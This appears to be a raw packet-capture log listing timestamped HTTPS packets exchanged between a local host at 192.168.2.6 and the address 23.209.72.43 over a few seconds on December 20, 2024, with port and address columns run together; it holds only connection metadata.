                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.859796047 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.859836102 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.859872103 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.859905005 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.859940052 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.860075951 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.860110044 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.860143900 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.860172033 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.860559940 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.883589029 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.197299004 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.197715044 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.206914902 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.207070112 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.207139969 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.207148075 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.207230091 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.207267046 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.207278013 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.207293034 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.207321882 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.220370054 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.535558939 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.543541908 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.543905973 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544315100 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544378996 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544397116 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544507027 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544522047 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544537067 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544553041 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544755936 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544770956 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544785976 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544800997 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544816971 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.544994116 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.545008898 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.545025110 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.545038939 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.545054913 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.545070887 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.546808958 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.554436922 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.554475069 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.554490089 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.554560900 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.554575920 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.554590940 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.554661989 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.554714918 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.554732084 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.554749012 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.555855989 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.565867901 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.565989971 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.566005945 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.566107035 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.566114902 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.566123009 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.566129923 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.566253901 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.566272974 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.566293955 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.566298008 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.576808929 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.576847076 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.576864004 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.576993942 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.577009916 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.577023983 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.577044010 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.577114105 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.577128887 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.577143908 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.577312946 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.592473984 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.592575073 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.593455076 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.626962900 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.882498026 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.945988894 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.951031923 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.951323032 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.951347113 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.951441050 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.951508045 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.951525927 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.951651096 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.951668978 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.951683998 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.951699018 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.951714039 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.965243101 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.279913902 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.292649984 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.292669058 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.292747974 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.292764902 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.292779922 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.292905092 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.292932034 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.292953014 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.292960882 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.293000937 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.293015957 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.293030024 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.293082952 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.293270111 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.311696053 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.625982046 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.631372929 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.631561995 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.631880999 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632127047 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632206917 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632282972 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632352114 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632400990 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632433891 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632468939 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632519007 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632591009 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632626057 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632661104 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632694960 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632729053 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632766008 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632801056 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632837057 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.632872105 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.633388996 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.647351027 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.647407055 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.647536039 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.647589922 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.647624969 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.647725105 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.647758007 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.647793055 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.647830963 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.647866011 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.647869110 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.663450956 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.663518906 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.663758039 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.665066004 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666043043 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666143894 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666186094 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666269064 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666311979 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666347027 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666380882 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666435003 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666470051 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666506052 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666569948 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666604042 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666640997 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666693926 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666728020 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666763067 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666817904 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.666874886 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.676307917 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.676414967 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.676450014 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.676557064 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.676573992 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.676610947 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.676682949 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.676717043 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.676750898 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.676801920 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.676836014 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.687628031 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.687690020 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.687725067 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.687850952 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.687851906 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.687903881 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.687956095 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.688010931 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.688045979 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.688079119 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.688113928 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.697988987 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.698067904 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.698137999 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.698173046 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.698205948 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.698239088 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.698276043 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.698275089 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.698312998 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.698347092 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.698443890 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.709767103 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.709844112 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.709878922 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.709932089 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.709965944 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.709999084 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.710033894 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.710068941 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.710108042 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.710141897 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.710141897 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.719996929 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.720051050 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.720266104 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.828133106 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.970415115 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.142481089 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.146955013 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.147291899 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.147349119 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.147365093 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.147438049 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.147454977 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.147454977 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.147469044 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.172239065 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.485620975 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.487850904 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.492882013 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.493114948 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.493156910 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.493175030 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.493240118 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.493256092 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.503825903 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.531776905 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.532474041 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.843938112 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.847351074 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.853738070 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.853806973 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.854110956 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.854140043 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.863013029 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.883053064 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.197266102 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.203107119 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.203366041 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.203450918 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.203463078 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.203568935 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.203584909 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.203668118 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.203682899 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.203700066 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.203711987 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.217598915 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.532057047 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.537703991 CET4436501423.209.72.43192.168.2.6
